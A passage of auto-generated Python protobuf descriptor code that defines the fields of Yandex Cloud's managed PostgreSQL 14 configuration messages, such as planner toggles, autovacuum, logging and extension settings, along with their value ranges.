serialized_options=b'\372\3071\n100-102400', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_bitmapscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_bitmapscan', index=76,
number=80, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_hashagg', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_hashagg', index=77,
number=81, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_hashjoin', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_hashjoin', index=78,
number=82, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_indexscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_indexscan', index=79,
number=83, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_indexonlyscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_indexonlyscan', index=80,
number=84, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_material', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_material', index=81,
number=85, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_mergejoin', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_mergejoin', index=82,
number=86, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_nestloop', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_nestloop', index=83,
number=87, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_seqscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_seqscan', index=84,
number=88, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_sort', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_sort', index=85,
number=89, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_tidscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_tidscan', index=86,
number=90, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_worker_processes', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_worker_processes', index=87,
number=91, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1024', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_parallel_workers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_parallel_workers', index=88,
number=92, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1024', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_parallel_workers_per_gather', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_parallel_workers_per_gather', index=89,
number=93, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1024', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_vacuum_scale_factor', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_vacuum_scale_factor', index=90,
number=94, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0070.0-1.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_analyze_scale_factor', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_analyze_scale_factor', index=91,
number=95, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0070.0-1.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_transaction_read_only', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.default_transaction_read_only', index=92,
number=96, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='timezone', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.timezone', index=93,
number=97, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_parallel_append', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_parallel_append', index=94,
number=98, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_parallel_hash', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_parallel_hash', index=95,
number=99, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_partition_pruning', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_partition_pruning', index=96,
number=100, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_partitionwise_aggregate', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_partitionwise_aggregate', index=97,
number=101, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_partitionwise_join', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_partitionwise_join', index=98,
number=102, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='jit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.jit', index=99,
number=103, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_parallel_maintenance_workers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_parallel_maintenance_workers', index=100,
number=104, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\003>=0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parallel_leader_participation', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.parallel_leader_participation', index=101,
number=105, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_transaction_sample_rate', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_transaction_sample_rate', index=102,
number=107, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0070.0-1.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='plan_cache_mode', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.plan_cache_mode', index=103,
number=108, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_io_concurrency', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.effective_io_concurrency', index=104,
number=109, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cache_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.effective_cache_size', index=105,
number=110, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0160-549755813888', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='shared_preload_libraries', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.shared_preload_libraries', index=106,
number=111, type=14, cpp_type=8, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_min_duration', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_min_duration', index=107,
number=112, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_analyze', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_analyze', index=108,
number=113, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_buffers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_buffers', index=109,
number=114, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_timing', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_timing', index=110,
number=115, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_triggers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_triggers', index=111,
number=116, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_verbose', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_verbose', index=112,
number=117, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_log_nested_statements', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_log_nested_statements', index=113,
number=118, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='auto_explain_sample_rate', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.auto_explain_sample_rate', index=114,
number=119, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0070.0-1.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_hint_plan_enable_hint', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_hint_plan_enable_hint', index=115,
number=120, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_hint_plan_enable_hint_table', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_hint_plan_enable_hint_table', index=116,
number=121, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_hint_plan_debug_print', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_hint_plan_debug_print', index=117,
number=122, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_hint_plan_message_level', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_hint_plan_message_level', index=118,
number=123, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='hash_mem_multiplier', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.hash_mem_multiplier', index=119,
number=124, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\n0.0-1000.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='logical_decoding_work_mem', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.logical_decoding_work_mem', index=120,
number=126, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\02365536-1099511627776', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='maintenance_io_concurrency', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.maintenance_io_concurrency', index=121,
number=127, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_slot_wal_keep_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_slot_wal_keep_size', index=122,
number=128, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\023-1-2251799812636672', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='wal_keep_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.wal_keep_size', index=123,
number=129, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\023-1-2251799812636672', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_incremental_sort', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_incremental_sort', index=124,
number=130, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_vacuum_insert_threshold', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_vacuum_insert_threshold', index=125,
number=131, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_vacuum_insert_scale_factor', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_vacuum_insert_scale_factor', index=126,
number=132, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\t0.0-100.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_min_duration_sample', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_min_duration_sample', index=127,
number=133, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_statement_sample_rate', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_statement_sample_rate', index=128,
number=134, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0070.0-1.0', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_parameter_max_length', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_parameter_max_length', index=129,
number=135, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_parameter_max_length_on_error', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_parameter_max_length_on_error', index=130,
number=136, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='client_connection_check_interval', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.client_connection_check_interval', index=131,
number=137, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_async_append', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_async_append', index=132,
number=138, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_gathermerge', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_gathermerge', index=133,
number=139, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_memoize', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.enable_memoize', index=134,
number=140, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_recovery_conflict_waits', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_recovery_conflict_waits', index=135,
number=141, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_failsafe_age', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_failsafe_age', index=136,
number=142, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_multixact_failsafe_age', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_multixact_failsafe_age', index=137,
number=143, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r-1-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_qualstats_enabled', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_qualstats_enabled', index=138,
number=144, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_qualstats_track_constants', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_qualstats_track_constants', index=139,
number=145, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_qualstats_max', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_qualstats_max', index=140,
number=146, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_qualstats_resolve_oids', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_qualstats_resolve_oids', index=141,
number=147, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pg_qualstats_sample_rate', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.pg_qualstats_sample_rate', index=142,
number=148, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_POSTGRESQLCONFIG14_WALLEVEL,
_POSTGRESQLCONFIG14_SYNCHRONOUSCOMMIT,
_POSTGRESQLCONFIG14_CONSTRAINTEXCLUSION,
_POSTGRESQLCONFIG14_FORCEPARALLELMODE,
_POSTGRESQLCONFIG14_LOGLEVEL,
_POSTGRESQLCONFIG14_LOGERRORVERBOSITY,
_POSTGRESQLCONFIG14_LOGSTATEMENT,
_POSTGRESQLCONFIG14_TRANSACTIONISOLATION,
_POSTGRESQLCONFIG14_BYTEAOUTPUT,
_POSTGRESQLCONFIG14_XMLBINARY,
_POSTGRESQLCONFIG14_XMLOPTION,
_POSTGRESQLCONFIG14_BACKSLASHQUOTE,
_POSTGRESQLCONFIG14_PLANCACHEMODE,
_POSTGRESQLCONFIG14_PGHINTPLANDEBUGPRINT,
_POSTGRESQLCONFIG14_SHAREDPRELOADLIBRARIES,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=163,
serialized_end=12480,
)
_POSTGRESQLCONFIGSET14 = _descriptor.Descriptor(
name='PostgresqlConfigSet14',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfigSet14',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='effective_config', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfigSet14.effective_config', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_config', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfigSet14.user_config', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_config', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfigSet14.default_config', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12483,
serialized_end=12754,
)
_POSTGRESQLCONFIG14.fields_by_name['max_connections'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['shared_buffers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['temp_buffers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLCONFIG14.fields_by_name['max_prepared_transactions'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
